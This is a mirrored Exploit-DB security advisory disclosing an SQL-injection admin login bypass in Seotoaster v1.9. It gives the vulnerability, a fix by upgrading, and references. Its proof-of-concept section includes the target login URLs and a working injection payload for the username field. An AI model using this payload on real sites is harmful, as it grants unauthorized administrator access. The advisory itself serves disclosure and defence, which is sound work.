bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18246.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

43 lines
No EOL
951 B
Text
Raw Blame History

#################################################################################
# Advisory: Seotoaster SQL-Injection Admin Login Bypass
# Author: Stefan Schurtz
# Contact: sschurtz@t-online.de
# Affected Software: Successfully tested on Seotoaster v.1.9
# Vendor URL: http://www.seotoaster.com/
# Vendor Status: fixed
#################################################################################
==========================
Vulnerability Description
==========================
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
==================
PoC-Exploit
==================
http://<target>/seotoaster/go
or
http://<target>/go
User: ' or 1=1)#
PW: notimportant
=========
Solution
=========
Upgrade to the latest version
========
Credits
========
Vulnerabilitiy found and advisory written by Stefan Schurtz
===========
References
===========
http://secunia.com/advisories/46881/
Reference in a new issue View git blame Copy permalink